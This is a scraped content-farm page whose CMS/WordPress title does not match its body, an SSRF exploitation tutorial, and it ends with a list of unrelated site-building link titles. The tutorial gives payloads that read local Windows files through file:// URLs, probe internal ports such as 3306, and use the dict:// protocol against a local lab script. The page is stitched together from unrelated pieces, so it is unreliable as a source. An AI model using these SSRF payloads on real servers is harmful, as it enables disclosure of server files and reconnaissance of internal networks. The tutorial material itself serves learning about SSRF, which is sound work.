当前位置: 首页 > news >正文

开发cms网站系统wordpress批量添加tag

news 2025/10/23 5:01:51
开发cms网站系统,wordpress批量添加tag,做一个网站 多少钱,织梦网站建设培训当遇到windows环境漏洞利用:1、读取服务器本地文件利用file协议可以读取本地文件:Windows: file://127.0.0.1/c:/ 访问本地C盘 file://localhost/d:/ 访问本地D盘 file:///e:/ 访问本地E盘现有 http://127.0.0.1/ss…

当遇到windows环境漏洞利用:

1、读取服务器本地文件

利用file协议可以读取本地文件:

Windows:
file://127.0.0.1/c:/      访问本地C盘
file://localhost/d:/      访问本地D盘
file:///e:/                访问本地E盘

现有 http://127.0.0.1/ssrf.php?url= 存在SSRF漏洞,可利用file协议读取本地文件:

?url=file:///c:/windows/win.ini
?url=file://127.0.0.1/c:/windows/win.ini
?url=file://localhost/c:/windows/win.ini

演示

POC

http://127.0.0.1/vul/ssrf/ssrf_curl.php?url=file:///c:/windows/win.ini

2、收集内网信息

方法一:直接将参数值设置为内网地址,附带端口号,判断内网主机端口开放情况,这里探测到服务器开放3306端口

?url=127.0.0.1:3306
?url=http://127.0.0.1:3306/

演示

3、利用dict协议探测端口,dict协议格式如下:

dict://ip:port/命令:参数

其中命令和参数不是必须的。

使用dict协议探测到服务器开放3306端口:

?url=dict://127.0.0.1:3306/
http://www.dtcms.com/a/514891.html

相关文章:

  • 企业网站备案管理系统网站收录不好的原因
  • 网站做超链接的方式有哪些海口 网站制作公司
  • wap网站软件wordpress loginview
  • 搜索网站大全WordPress知更鸟首页幻灯
  • 网站单页做301重庆建设工业集团官网
  • 淘宝的网站建设深圳投资推广署官网
  • 南昌优化网站服务企业网站搜索优化
  • 秦皇岛网站制作与网站建设常德网站建设产品
  • 网站名字备案怎样在浏览器上找网站
  • wordpress网站推翻重建中国有色金属建设股份有限公司网站
  • 企业信息公开网站如何进入优容网站
  • 计算机网站php设计代做线上推广费用
  • 网站关键词的优化在哪做定制鱼缸一般多少钱
  • 网站建设技能考外面网站怎么做的
  • 长春好的做网站公司旅游网站规划说明
  • 建建设人才市场官方网站wordpress的修改后主题后台出现已损坏的修复
  • 怎么自己做网站赚钱手机网站域名哪里注册时间
  • 建设一个视频网站需要什么条件网站名称如何设置
  • 网站开发的方案模板网站哪家好
  • 什么网站有教做变蛋的红孩子母婴网站开发背景
  • 建设网站哪家比较好代理记账公司收费表
  • dedecms网站后台利用百度图片做网站外链
  • 榆林医疗网站建设县区网站集约化建设
  • wordpress火车头发布模板上海网站优化推广公司
  • 音乐网站建设论文wordpress与淘宝
  • 设计师必去的网站管理信息系统平台
  • 重庆公司免费网站建设软件培训
  • 做电影网站如何寻找资源网页快速收录
  • 合肥集团网站建设我国网站开发
  • 中国建设人才平台网站能上外国网站dns